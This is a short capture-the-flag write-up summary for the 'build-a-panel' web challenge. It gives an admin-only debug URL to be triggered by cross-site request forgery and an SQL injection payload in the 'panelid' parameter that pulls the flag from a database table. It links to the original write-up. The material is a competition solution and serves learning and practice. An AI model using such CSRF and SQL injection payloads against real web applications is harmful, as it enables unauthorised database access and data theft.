Tags: web 

Rating:

CSRF URL: [https://build-a-panel.dicec.tf/admin/debug/add_widget](https://build-a-panel.dicec.tf/admin/debug/add_widget) (only Admin can access)

SQLi payload: `<Your panel ID>',(select flag from flag),'{"type":"a"}');#`

Final payload to send to Admin: `https://build-a-panel.dicec.tf/admin/debug/add_widget?panelid=<Your panel ID>',(select flag from flag),'{"type":"a"}');#`.

Original writeup (http://github.com/effectRenan/CTF).